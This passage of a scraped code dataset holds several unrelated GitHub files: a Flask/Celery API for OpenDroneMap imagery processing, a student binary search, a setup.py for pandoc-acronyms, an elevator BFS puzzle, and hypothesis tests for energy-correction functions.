'/code/run.py',\n '--project-path',\n '.', # this will be executed from the project directory\n ]\n\n def cleanup():\n for dir in ('images_resize', 'odm_georeferencing', 'odm_meshing', 'odm_orthophoto', 'odm_texturing', 'opensfm', 'pmvs'):\n target_path = os.path.join(project_path, dir)\n os.path.isdir(target_path) and shutil.rmtree(target_path)\n os.path.isfile(target_path) and os.unlink(target_path)\n\n self.update_state(state='RUNNING',\n meta={\n 'name': 'opendronemap',\n 'started_at': started_at.isoformat(),\n 'status': 'Processing imagery',\n 'task_id': self.request.id,\n })\n\n child = None\n\n try:\n # start by cleaning up in case the previous run was cancelled\n cleanup()\n log_path = os.path.join(project_path, 'logs')\n\n os.path.exists(log_path) or os.mkdir(log_path)\n with open(os.path.join(log_path, 'stdout.log'), 'w+') as stdout:\n with open(os.path.join(log_path, 'stderr.log'), 'w+') as stderr:\n # NOTE: this is used instead of check_call so that we can call terminate() on the\n # child rather than assuming that signals will be passed through and be handled\n # correctly\n child = subprocess.Popen(command, cwd=project_path, stdout=stdout, stderr=stderr)\n child.wait(timeout=60*60*6)\n except subprocess.TimeoutExpired as e:\n child.kill()\n child.wait()\n cleanup()\n\n raise Exception(json.dumps({\n 'name': 'opendronemap',\n 'started_at': started_at.isoformat(),\n 'command': ' '.join(command),\n 'status': 'Timed out'\n }))\n except subprocess.CalledProcessError as e:\n cleanup()\n\n raise Exception(json.dumps({\n 'name': 'opendronemap',\n 'started_at': started_at.isoformat(),\n 'command': e.cmd,\n 'return_code': e.returncode,\n 'status': 'Failed'\n }))\n except:\n if child:\n child.terminate()\n raise\n\n # clean up and move artifacts\n artifacts_path = os.path.join(project_path, 'artifacts')\n if os.path.exists(artifacts_path):\n shutil.rmtree(artifacts_path)\n else:\n os.mkdir(artifacts_path)\n\n for artifact in ('odm_texturing', 'odm_orthophoto/odm_orthophoto.tif', 'odm_orthophoto/odm_orthophoto.png'):\n src_path = os.path.join(project_path, artifact)\n\n if os.path.isdir(src_path):\n for item in os.listdir(src_path):\n shutil.move(os.path.join(src_path, item), artifacts_path)\n else:\n os.path.exists(src_path) and shutil.move(src_path, artifacts_path)\n\n # create a thumbnail\n im = Image.open(os.path.join(artifacts_path, 'odm_orthophoto.png'))\n im.thumbnail((128, 128))\n im.save(os.path.join(artifacts_path, 'ortho_thumb.png'))\n\n with rasterio.drivers():\n with rasterio.open(os.path.join(artifacts_path, 'odm_orthophoto.tif')) as src:\n metadata = get_metadata(id)\n\n metadata.update({\n 'status': {\n 'state': 'SUCCESS',\n },\n 'meta': {\n 'width': src.width,\n 'height': src.height,\n 'resolution': src.res,\n 'crs': str(src.crs),\n 'crs_wkt': src.crs.wkt,\n 'bounds': transform_bounds(src.crs, {'init': 'epsg:4326'}, *src.bounds),\n 'size': os.stat(src.name).st_size,\n }\n })\n\n save_metadata(id, metadata)\n\n cleanup()\n os.unlink(os.path.join(project_path, \"process.task\"))\n\n return {\n 'name': 'preprocess',\n 'completed_at': datetime.utcnow().isoformat(),\n 'started_at': started_at,\n 'status': 'Image processing completed'\n }\n\n\ndef get_task_status(id):\n task_info_path = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n if os.path.exists(task_info_path):\n with open(task_info_path) as t:\n task_id = t.read()\n\n return fetch_status(task_id)\n\n else:\n return {}\n\n\ndef get_metadata(id):\n metadata_path = os.path.join(PROJECTS_PATH, id, 'index.json')\n images_path = os.path.join(PROJECTS_PATH, id, 'images')\n artifacts_path = os.path.join(PROJECTS_PATH, id, 'artifacts')\n\n if os.path.exists(metadata_path):\n with open(metadata_path) as metadata:\n metadata = json.load(metadata)\n else:\n metadata = {\n 'images': [],\n 'artifacts': [],\n 'status': {},\n 'user': {},\n }\n\n if os.path.exists(images_path):\n metadata['images'] = os.listdir(images_path)\n\n if os.path.exists(artifacts_path):\n metadata['artifacts'] = os.listdir(artifacts_path)\n\n status = get_task_status(id)\n if status:\n metadata['status'] = status\n\n return metadata\n\n\ndef save_metadata(id, metadata):\n metadata_path = os.path.join(PROJECTS_PATH, id, 'index.json')\n\n if not os.path.exists(os.path.dirname(metadata_path)):\n os.makedirs(os.path.dirname(metadata_path))\n\n with open(metadata_path, 'w') as metadata_file:\n metadata_file.write(json.dumps(metadata))\n\n\n@app.errorhandler(IOError)\ndef handle_ioerror(error):\n return '', 404\n\n\n@app.route('/tasks')\ndef list_tasks():\n i = celery.control.inspect()\n\n status = {\n 'scheduled': i.scheduled(),\n 'active': i.active(),\n 'reserved': i.reserved(),\n }\n\n return jsonify(status), 200\n\n\n@app.route('/projects')\ndef list_projects():\n \"\"\"List available projects\"\"\"\n projects = dict(map(lambda project: (project, get_metadata(project)), filter(\n lambda project: os.path.isdir(os.path.join(PROJECTS_PATH, project)), os.listdir(PROJECTS_PATH))))\n\n return jsonify(projects), 200\n\n\n@app.route('/projects', methods=['PUT'])\ndef create_project():\n body = request.get_json(force=True)\n\n id = str(uuid.uuid4())\n\n metadata = get_metadata(id)\n\n metadata['user'] = body\n\n save_metadata(id, metadata)\n\n return jsonify(metadata), 201\n\n\n@app.route('/projects/', methods=['PATCH', 'POST'])\ndef update_project(id):\n body = request.get_json(force=True)\n\n metadata = get_metadata(id)\n\n if request.method == 'PATCH':\n metadata['user'].update(body)\n else:\n metadata['user'] = body\n\n save_metadata(id, metadata)\n\n return jsonify(metadata), 200\n\n\n@app.route('/projects//upload', methods=['PUT'])\ndef upload_imagery(id):\n path = app.config['UPLOADED_IMAGERY_DEST'] + imagery.save(request.files['file'])\n\n target_path = upload_file_handler(path, id=id)\n\n with app.app_context():\n return jsonify({\n 'project': url_for('get_project', id=id, _external=True),\n }), 200\n\n\n@app.route('/projects/')\ndef get_project(id):\n return jsonify(get_metadata(id)), 200\n\n\n@app.route('/projects//images')\ndef list_project_images(id):\n return jsonify(get_metadata(id)['images']), 200\n\n\n@app.route('/projects//images/')\ndef download_project_image(id, image_id):\n images_path = os.path.join(PROJECTS_PATH, id, 'images')\n return send_from_directory(\n images_path,\n image_id,\n conditional=True\n )\n\n\n@app.route('/projects//images//thumb')\n@lru_cache()\ndef get_project_image_thumbnail(id, image_id):\n im = Image.open(os.path.join(PROJECTS_PATH, id, 'images', image_id))\n out = StringIO()\n im.thumbnail((128, 128))\n im.save(out, \"jpeg\")\n\n return out.getvalue(), 200, {\n 'Content-Type': 'image/jpeg'\n }\n\n\n@app.route('/projects//logs/stderr')\ndef get_project_stderr(id):\n return send_from_directory(\n os.path.join(PROJECTS_PATH, id, 'logs'),\n 'stderr.log',\n conditional=True,\n mimetype='text/plain',\n )\n\n\n@app.route('/projects//logs/stdout')\ndef get_project_stdout(id):\n return send_from_directory(\n os.path.join(PROJECTS_PATH, id, 'logs'),\n 'stdout.log',\n conditional=True,\n mimetype='text/plain',\n )\n\n\n@app.route('/projects//artifacts')\ndef list_project_artifacts(id):\n return jsonify(get_metadata(id)['artifacts']), 200\n\n\n@app.route('/projects//artifacts/')\ndef download_project_artifact(id, artifact_id):\n return send_from_directory(\n os.path.join(PROJECTS_PATH, id, 'artifacts'),\n artifact_id,\n conditional=True\n )\n\n\n@app.route('/projects//process', methods=['POST'])\ndef start_processing_project(id):\n task_info = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n if os.path.exists(task_info) and not request.args.get('force'):\n return jsonify({\n 'message': 'Processing already in progress, ?force=true to force'\n }), 400\n\n task = process_project.s(id=id).apply_async()\n\n # stash task.id so we know which task to look up\n with open(task_info, 'w') as f:\n f.write(task.id)\n\n return '', 202, {\n 'Location': url_for('get_project_status', id=id)\n }\n\n\n@app.route('/projects//process', methods=['DELETE'])\ndef cancel_processing_project(id):\n task_info = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n with open(task_info) as t:\n task_id = t.read()\n\n celery.control.revoke(task_id, terminate=True)\n\n return '', 201\n\n\ndef fetch_status(task_id):\n result = celery.AsyncResult(task_id)\n\n status = {\n # TODO result.state doesn't account for the states of all children\n 'state': result.state,\n 'steps': []\n }\n\n for _, node in result.iterdeps(intermediate=True):\n if hasattr(node, 'info'):\n if isinstance(node.info, Exception):\n try:\n status['steps'].append(json.loads(node.info.message))\n except:\n status['steps'].append(node.info.message)\n else:\n status['steps'].append(node.info)\n\n return status\n\n\n@app.route('/projects//status')\ndef get_project_status(id):\n task_info = os.path.join(PROJECTS_PATH, id, 'process.task')\n\n if os.path.exists(task_info):\n with open(task_info) as t:\n task_id = t.read()\n\n return jsonify(fetch_status(task_id)), 200\n\n elif os.path.exists(os.path.dirname(task_info)):\n metadata = get_metadata(id)\n return jsonify(metadata['status']), 200\n\n else:\n return '', 404\n\n\napp.wsgi_app = DispatcherMiddleware(None, {\n app.config['APPLICATION_ROOT']: app.wsgi_app\n})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000, debug=True)\n","repo_name":"posm/posm-opendronemap-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13459,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"11726745026","text":"a = [27,36,21,7,4]\ndef cari(a,key):\n awal = 0\n akhir = len(a)\n\n for i in range(awal, akhir):\n tengah = int((awal+akhir)/2)\n if(key == a[tengah]):\n print(\"data ditemukan pada indeks ke \", tengah)\n break\n elif(key < a[tengah]):\n akhir = tengah-1\n else: \n awal = tengah + 1\na.sort()\nprint(a)\ncari(a,36)","repo_name":"shalexandeer/PPL-2021","sub_path":"week10/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6650696285","text":"import setuptools\nimport os\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='pandoc-acronyms',\n # the PACKAGE_VERSION variable is defined in the CI runner:\n version=os.environ.get('PACKAGE_VERSION') or '0.0.1.dev0',\n author=\"Mirko Boehm\",\n author_email=\"mirko@kde.org\",\n description=\"A Python filter to manage acronyms\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://gitlab.com/mirkoboehm/pandoc-acronyms\",\n packages=find_packages(),\n include_package_data=True,\n install_requires=[\n 'Click',\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n 'Development Status :: 4 - Beta',\n ],\n entry_points='''\n [console_scripts]\n pandoc-acronyms=filter.pandocacronyms:filter\n ''',\n python_requires='>=3.6',\n)\n","repo_name":"elnull/pandoc-acronyms","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6900976656","text":"# 현재 층을 큐에 삽입한 후 상, 하로 움직이면서 목표층에 도달할 수 있는지 파악한다.\n# 도달하는 경우 움직인 최솟값을 출력한다\n# 도달하지 못하는 경우 use the stairs를 출력\n\nfrom collections import deque\n\n\ndef bfs(F, S, G, U, D):\n q = deque([[S, 0]])\n visited = {S}\n\n while q:\n floor, cnt = q.popleft()\n if floor == G: # 목표 층에 도착\n return cnt\n if floor + U <= F and floor + U not in visited: # 위층으로 이동\n q.append([floor + U, cnt + 1])\n visited.add(floor + U)\n if floor - D >= 1 and floor - D not in visited: # 아래층으로 이동\n q.append([floor - D, cnt + 1])\n visited.add(floor - D)\n\n return \"use the stairs\"\n\n\nif __name__ == \"__main__\":\n\n F, S, G, U, D = map(int, input().split())\n\n print(bfs(F, S, G, U, D))\n","repo_name":"kim-jiha95/javascript","sub_path":"python/03_Exam/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71495158015","text":"from collections import namedtuple\n\nimport numpy as np\n\nfrom .. core import fit_functions as fitf\nfrom .. core.exceptions import ParameterNotSet\nfrom .. core.stat_functions import poisson_sigma\nfrom .. core.core_functions import shift_to_bin_centers\nfrom .. reco.corrections import Correction\nfrom .. reco.corrections import Fcorrection\nfrom .. reco.corrections import LifetimeCorrection\nfrom .. reco.corrections import LifetimeRCorrection\nfrom .. reco.corrections import LifetimeXYCorrection\nfrom .. reco.corrections import opt_nearest\nfrom .. reco.corrections import opt_linear\nfrom .. reco.corrections import opt_cubic\n\nfrom numpy.testing import assert_allclose\nfrom pytest import fixture\nfrom pytest import mark\nfrom pytest import raises\nfrom flaky import flaky\n\nfrom hypothesis import given\nfrom hypothesis import settings\nfrom hypothesis.strategies import floats\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import composite\nfrom hypothesis.extra.numpy import arrays\n\n\ndata_1d = namedtuple(\"data_1d\", \"X E Eu Xdata Edata\")\ndata_2d = namedtuple(\"data_2d\", \"X Y E Eu Xdata Ydata Edata\")\n\nFField_1d = namedtuple(\"Ffield1d\", \"X P Pu F Fu fun u_fun\")\nFField_2d = namedtuple(\"Ffield2d\", \"X Y P Pu F Fu fun u_fun\")\nEField_1d = namedtuple(\"Efield1d\", \"X E Eu F Fu imax\" )\nEField_2d = namedtuple(\"Efield2d\", \"X Y E Eu F Fu imax jmax\")\n\n\n@composite\ndef uniform_energy_1d(draw):\n size = draw(integers(min_value= 2 , max_value=10 ))\n X0 = draw(floats (min_value=-100, max_value=100))\n dX = draw(floats (min_value= 0.1, max_value=100))\n X = np.arange(size) * dX + X0\n E = draw(arrays(float, size, floats(min_value=1e+3, max_value=2e+3)))\n u_rel = draw(arrays(float, size, floats(min_value=1e-2, max_value=2e-1)))\n Eu = E * u_rel\n\n i_max = np.argmax(E)\n e_max = E [i_max]\n u_max = Eu[i_max]\n\n F = E.max()/E\n Fu = F * (Eu**2 / E**2 + u_max**2 / e_max**2)**0.5\n\n return EField_1d(X, E, Eu, F, Fu, i_max)\n\n\n@composite\ndef uniform_energy_2d(draw):\n x_size = draw(integers(min_value=2 , max_value=10 ))\n y_size = draw(integers(min_value=2 , max_value=10 ))\n X0 = draw(floats (min_value=-100, max_value=100))\n Y0 = draw(floats (min_value=-100, max_value=100))\n dX = draw(floats (min_value= 0.1, max_value=100))\n dY = draw(floats (min_value= 0.1, max_value=100))\n X = np.arange(x_size) * dX + X0\n Y = np.arange(y_size) * dY + Y0\n E = draw(arrays(float, (x_size, y_size), floats(min_value = 1e+3,\n max_value = 2e+3)))\n u_rel = draw(arrays(float, (x_size, y_size), floats(min_value = 1e-2,\n max_value = 2e-1)))\n Eu = E * u_rel\n\n i_max = draw(integers(min_value=0, max_value=x_size - 1))\n j_max = draw(integers(min_value=0, max_value=y_size - 1))\n e_max = E [i_max, j_max]\n u_max = Eu[i_max, j_max]\n\n F = e_max / E\n Fu = F * (Eu**2 / E**2 + u_max**2 / e_max**2)**0.5\n\n return EField_2d(X, Y, E, Eu, F.flatten(), Fu.flatten(), i_max, j_max)\n\n\n@composite\ndef uniform_energy_fun_data_1d(draw):\n fun = lambda z, LT, u_LT: fitf.expo(z, 1, LT)\n u_fun = lambda z, LT, u_LT: z * u_LT / LT**2 * fun(z, LT, u_LT)\n LT = draw(floats(min_value=1e+2, max_value=1e+3))\n u_LT = draw(floats(min_value=1e+1, max_value=1e+1))\n Z = np.linspace(0, 600, 100)\n F = fun(Z, LT, u_LT)\n u_F = u_fun(Z, LT, u_LT)\n return FField_1d(Z, LT, u_LT, F, u_F, fun, u_fun)\n\n\n@composite\ndef uniform_energy_fun_data_2d(draw):\n def fun(z, r, a, b, c, u_a, u_b, u_c):\n LT = a - b * r * np.exp(r / c)\n return fitf.expo(z, 1, LT)\n\n def u_fun(z, r, a, b, c, u_a, u_b, u_c):\n LT = a - b * r * np.exp(r / c)\n u_LT = (u_a**2 + u_b**2 * np.exp(2 * r / c) +\n u_c**2 * b**2 * r**2 * np.exp(2 * r / c) / c**4)**0.5\n return z * u_LT / LT**2 * fun(z, r, a, b, c, u_a, u_b, u_c)\n\n a = draw(floats(min_value=1e+2, max_value=1e+3));u_a = 0.1 * a\n b = draw(floats(min_value=1e-2, max_value=1e-1));u_b = 0.1 * b\n c = draw(floats(min_value=1e+3, max_value=5e+3));u_c = 0.1 * c\n Z = np.linspace(0, 600, 100)\n R = np.linspace(0, 200, 100)\n F = fun(Z, R, a, b, c, u_a, u_b, u_c)\n u_F = u_fun(Z, R, a, b, c, u_a, u_b, u_c)\n return FField_2d(Z, R, (a, b, c), (u_a, u_b, u_c), F, u_F, fun, u_fun)\n\n\n@composite\ndef uniform_energy_fun_data_3d(draw):\n x_size = draw(integers(min_value= 2 , max_value=10 ))\n y_size = draw(integers(min_value= 2 , max_value=10 ))\n X0 = draw(floats (min_value=-100, max_value=100))\n Y0 = draw(floats (min_value=-100, max_value=100))\n dX = draw(floats (min_value= 0.1, max_value=100))\n dY = draw(floats (min_value= 0.1, max_value=100))\n X = np.arange(x_size) * dX + X0\n Y = np.arange(y_size) * dY + Y0\n\n LTs = draw(arrays(float, (x_size, y_size), floats(min_value = 1e+2,\n max_value = 1e+3)))\n u_LTs = LTs * 0.1\n\n LTc = Correction((X, Y), LTs, u_LTs,\n **opt_nearest)\n\n def LT_corr(z, x, y):\n return np.exp(z / LTc(x, y).value)\n\n def u_LT_corr(z, x, y):\n ltc = LTc(x, y)\n return z * ltc.uncertainty / ltc.value**2 * np.exp(z / ltc.value)\n\n return FField_2d(X, Y, LTs, u_LTs, LTs, u_LTs, LT_corr, u_LT_corr)\n\n\n@fixture\ndef gauss_data_1d():\n mean = lambda z: 1e4 * np.exp(-z / 1000)\n Nevt = 100000\n Zevt = np.random.uniform(0, 500, size=Nevt)\n Eevt = np.random.normal(mean(Zevt), mean(Zevt)**0.5)\n prof = fitf.profileX(Zevt, Eevt, 50, (0, 500))\n return data_1d(*prof, Zevt, Eevt)\n\n\n@fixture\ndef gauss_data_2d():\n mean = lambda x, y: 1e4 * np.exp(-(x**2 + y**2) / 400**2)\n Nevt = 100000\n Xevt = np.random.uniform(-200, 200, size=Nevt)\n Yevt = np.random.uniform(-200, 200, size=Nevt)\n Eevt = np.random.normal(mean(Xevt, Yevt), mean(Xevt, Yevt)**0.5)\n prof = fitf.profileXY(Xevt, Yevt, Eevt, 50, 50, (-200, 200), (-200, 200))\n return data_2d(*prof, Xevt, Yevt, Eevt)\n\n\n#--------------------------------------------------------\n#--------------------------------------------------------\n@mark.parametrize(\"strategy options\".split(),\n ((\"const\", {}),\n (\"index\", {}),\n (\"const\", {\"wrong_option\": None}),\n (\"index\", {\"wrong_option\": None})))\ndef test_correction_raises_exception_when_input_is_incomplete(strategy, options):\n data = np.arange(5)\n with raises(ParameterNotSet):\n Correction((data,), data, data,\n norm_strategy = strategy,\n norm_opts = options,\n **opt_nearest)\n\n\ndef test_correction_raises_exception_when_data_is_invalid():\n x = np.arange( 0, 10)\n y = np.arange(-10, 0)\n z = np.zeros ((x.size, y.size))\n u_z = np.ones ((x.size, y.size))\n with raises(AssertionError):\n Correction((x, y), z, u_z,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (0, 0)},\n **opt_nearest)\n\n\n@given(uniform_energy_1d())\ndef test_correction_attributes_1d(toy_data_1d):\n X, E, Eu, F, Fu, _ = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n assert_allclose(correct._xs[0], X ) # correct.xs is a list of axis\n assert_allclose(correct._fs , F )\n assert_allclose(correct._us , Fu)\n\n\n@given(uniform_energy_1d())\ndef test_correction_attributes_1d_unnormalized(toy_data_1d):\n X, _, _, F, Fu, _ = toy_data_1d\n c = Correction((X,), F, Fu,\n norm_strategy = None,\n **opt_nearest)\n assert_allclose(c._fs, F )\n assert_allclose(c._us, Fu)\n\n\n@settings(max_examples=1)\n@given(uniform_energy_1d())\ndef test_correction_call_scalar_values_1d(toy_data_1d):\n X, E, Eu, F, Fu, _ = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n F_corrected, U_corrected = correct(X[0])\n assert F_corrected == F [0]\n assert U_corrected == Fu[0]\n\n\n@given(uniform_energy_1d())\ndef test_correction_call_1d(toy_data_1d):\n X, E, Eu, F, Fu, _ = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n F_corrected, U_corrected = correct(X)\n assert_allclose(F_corrected, F )\n assert_allclose(U_corrected, Fu)\n\n\n@given(uniform_energy_1d())\ndef test_correction_normalization_1d_to_max(toy_data_1d):\n X, E, Eu, *_, i_max = toy_data_1d\n correct = Correction((X,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n\n x_test = X\n corrected_E = E * correct(x_test).value\n assert_allclose(corrected_E, np.max(E))\n\n\n@given(uniform_energy_1d(),\n floats (min_value=1e-8, max_value=1e8))\ndef test_correction_normalization_1d_to_const(toy_data_1d, norm_value):\n X, E, Eu, _, _, _ = toy_data_1d\n c = Correction((X,), E, Eu,\n norm_strategy = \"const\",\n norm_opts = {\"value\": norm_value},\n **opt_nearest)\n\n assert_allclose(c._fs, norm_value / E)\n assert_allclose(c._us, norm_value / E**2 * Eu)\n\n\n@given(uniform_energy_1d())\ndef test_correction_normalization_to_center_1d(toy_data_1d):\n X, E, Eu, *_ = toy_data_1d\n c = Correction((X,), E, Eu,\n norm_strategy = \"center\")\n\n norm_index = X.size // 2\n norm_value = E [norm_index]\n norm_uncer = Eu[norm_index]\n prop_uncer = (Eu / E)**2 + (norm_uncer / norm_value)**2\n prop_uncer = prop_uncer**0.5 * norm_value / E\n\n assert_allclose(c._fs, norm_value / E)\n assert_allclose(c._us, prop_uncer )\n\n\n@given(uniform_energy_2d())\ndef test_correction_normalization_to_center_2d(toy_data_2d):\n X, Y, E, Eu, *_ = toy_data_2d\n c = Correction((X, Y), E, Eu,\n norm_strategy = \"center\")\n\n norm_index = X.size // 2, Y.size // 2\n norm_value = E [norm_index]\n norm_uncer = Eu[norm_index]\n prop_uncer = (Eu / E)**2 + (norm_uncer / norm_value)**2\n prop_uncer = prop_uncer**0.5 * norm_value / E\n\n assert_allclose(c._fs, norm_value / E)\n assert_allclose(c._us, prop_uncer )\n\n\n#--------------------------------------------------------\n\n@given(uniform_energy_2d())\ndef test_correction_attributes_2d(toy_data_2d):\n X, Y, E, Eu, F, Fu, i_max, j_max = toy_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (i_max, j_max)},\n **opt_nearest)\n\n # attributes of the Correction class are 2d arrays,\n # so they must be flatten for comparison\n assert_allclose(correct._fs.flatten(), F )\n assert_allclose(correct._us.flatten(), Fu)\n\n\n@given(uniform_energy_2d())\n@settings(deadline=None)\ndef test_correction_attributes_2d_unnormalized(toy_data_2d):\n X, Y, _, _, F, Fu, _, _ = toy_data_2d\n c = Correction((X, Y), F, Fu,\n norm_strategy = None,\n **opt_nearest)\n\n assert_allclose(c._fs, F )\n assert_allclose(c._us, Fu)\n\n\n@settings(max_examples=1)\n@given(uniform_energy_2d())\ndef test_correction_call_scalar_values_2d(toy_data_2d):\n X, Y, E, Eu, F, Fu, i_max, j_max = toy_data_2d\n correct = Correction((X,Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (i_max, j_max)},\n **opt_nearest)\n\n F_corrected, U_corrected = correct(X[0], Y[0])\n assert F_corrected == F [0]\n assert U_corrected == Fu[0]\n\n\n@given(uniform_energy_2d())\ndef test_correction_normalization_2d_to_max(toy_data_2d):\n X, Y, E, Eu, *_, i_max = toy_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"max\")\n\n x_test = np.repeat(X, Y.size)\n y_test = np.tile (Y, X.size)\n corrected_E = E.flatten() * correct(x_test, y_test).value\n assert_allclose(corrected_E, np.max(E))\n\n\n@given(uniform_energy_2d())\ndef test_correction_call_2d(toy_data_2d):\n X, Y, E, Eu, F, Fu, i_max, j_max = toy_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (i_max, j_max)},\n **opt_nearest)\n\n # create a collection of (x,y) point such that the\n # x coordinates are stored in X_sample and the y coordinates in Y_sample\n X_sample = np.array([x for x in X for _ in Y])\n Y_sample = np.array([y for _ in X for y in Y])\n\n F_corrected, U_corrected = correct(X_sample, Y_sample)\n assert_allclose(F_corrected, F )\n assert_allclose(U_corrected, Fu)\n\n\n#--------------------------------------------------------\n\n@given(uniform_energy_fun_data_1d())\ndef test_fcorrection(toy_f_data):\n Z, LT, u_LT, F, u_F, fun, u_fun = toy_f_data\n correct = Fcorrection(fun, u_fun, (LT, u_LT))\n f_corrected, u_corrected = correct(Z)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_1d())\ndef test_lifetimecorrection(toy_f_data):\n Z, LT, u_LT, F, u_F, fun, u_fun = toy_f_data\n correct = LifetimeCorrection(LT, u_LT)\n f_corrected, u_corrected = correct(Z)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_2d())\ndef test_lifetimeRcorrection(toy_f_data):\n Z, R, pars, u_pars, F, u_F, fun, u_fun = toy_f_data\n correct = LifetimeRCorrection(pars, u_pars)\n f_corrected, u_corrected = correct(Z, R)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_3d())\ndef test_lifetimeXYcorrection(toy_f_data):\n Xgrid, Ygrid, LTs, u_LTs, LTs, u_LTs, LT_corr, u_LT_corr = toy_f_data\n\n X = np.repeat (Xgrid, Ygrid.size)\n Y = np.tile (Ygrid, Xgrid.size)\n Z = np.linspace(0, 50, X .size)\n F, u_F = LT_corr(Z, X, Y), u_LT_corr(Z, X, Y)\n correct = LifetimeXYCorrection(LTs, u_LTs, Xgrid, Ygrid, **opt_nearest)\n f_corrected, u_corrected = correct(Z, X, Y)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n@given(uniform_energy_fun_data_3d())\n@settings(deadline=None)\ndef test_lifetimeXYcorrection_kwargs(toy_f_data):\n Xgrid, Ygrid, LTs, u_LTs, LTs, u_LTs, LT_corr, u_LT_corr = toy_f_data\n kwargs = {\"norm_strategy\" : \"const\",\n \"norm_opts\" : {\"value\": 1},\n **opt_nearest}\n\n X = np.repeat (Xgrid, Ygrid.size)\n Y = np.tile (Ygrid, Xgrid.size)\n Z = np.linspace(0, 50, X .size)\n F, u_F = LT_corr(Z, X, Y), u_LT_corr(Z, X, Y)\n\n # These input values are chosen because they\n # effectively cancel the normalization.\n correct = LifetimeXYCorrection(1 / LTs, u_LTs / LTs**2,\n Xgrid, Ygrid, **kwargs)\n f_corrected, u_corrected = correct(Z, X, Y)\n\n assert_allclose( F, f_corrected)\n assert_allclose(u_F, u_corrected)\n\n\n#--------------------------------------------------------\n\n\n@mark.slow\n@flaky(max_runs=5, min_passes=4)\ndef test_corrections_1d(gauss_data_1d):\n Z, E, Eu, Zevt, Eevt = gauss_data_1d\n\n correct = Correction((Z,), E, Eu,\n norm_strategy = \"max\",\n **opt_nearest)\n Eevt *= correct(Zevt).value\n\n mean = np.mean(Eevt)\n std = np.std (Eevt)\n\n y, x = np.histogram(Eevt, np.linspace(mean - 3 * std,\n mean + 3 * std,\n 100))\n x = shift_to_bin_centers(x)\n sigma = poisson_sigma(y)\n f = fitf.fit(fitf.gauss, x, y, (1e5, mean, std), sigma=sigma)\n\n assert 0.75 < f.chi2 < 1.5\n\n\n@mark.slow\n@flaky(max_runs=5, min_passes=4)\ndef test_corrections_2d(gauss_data_2d):\n X, Y, E, Eu, Xevt, Yevt, Eevt = gauss_data_2d\n correct = Correction((X, Y), E, Eu,\n norm_strategy = \"index\",\n norm_opts = {\"index\": (25, 25)},\n **opt_nearest)\n Eevt *= correct(Xevt, Yevt)[0]\n\n mean = np.mean(Eevt)\n std = np.std (Eevt)\n\n y, x = np.histogram(Eevt, np.linspace(mean - 3 * std,\n mean + 3 * std,\n 100))\n x = shift_to_bin_centers(x)\n sigma = poisson_sigma(y)\n f = fitf.fit(fitf.gauss, x, y, (1e5, mean, std), sigma=sigma)\n\n assert 0.75 < f.chi2 < 1.5\n\n\ndef test_corrections_linear_interpolation():\n # This is the function f(x,y) = x + y on a square grid. Because the\n # interpolation is linear, any point with coordinates (x, y) should\n # yield exactly f(x, y).\n xmin, xmax = 10, 20\n ymin, ymax = 20, 30\n grid_x = np.arange(xmin, xmax+1)\n grid_y = np.arange(ymin, ymax+1)\n grid_points = np.array([(i, j) for i in grid_x\\\n for j in grid_y])\n\n grid_fun = np.sum\n grid_values = np.apply_along_axis(grid_fun, 1, grid_points)\n grid_uncert = np.apply_along_axis(grid_fun, 1, grid_points)/10\n\n correct = Correction((grid_x, grid_y),\n grid_values,\n grid_uncert,\n **opt_linear)\n\n x_test = np.random.uniform(xmin, xmax, size=100)\n y_test = np.random.uniform(ymin, ymax, size=100)\n xy_test = np.stack([x_test, y_test], axis=1)\n\n correction = correct(x_test, y_test)\n expected_values = np.apply_along_axis(grid_fun, 1, xy_test)\n expected_uncert = expected_values/10\n\n assert np.allclose(correction.value , expected_values)\n assert np.allclose(correction.uncertainty, expected_uncert)\n\n\ndef test_corrections_cubic_interpolation():\n # This is the function f(x,y) = x + y on a square grid. Because the\n # interpolation is cubic, any point with coordinates (x, y) should\n # yield exactly f(x, y). This test should probably contain a more\n # complicated function.\n xmin, xmax = 10, 20\n ymin, ymax = 20, 30\n grid_x = np.arange(xmin, xmax + 1)\n grid_y = np.arange(ymin, ymax + 1)\n grid_points = np.array([(i, j) for i in grid_x\\\n for j in grid_y])\n\n grid_fun = np.sum\n 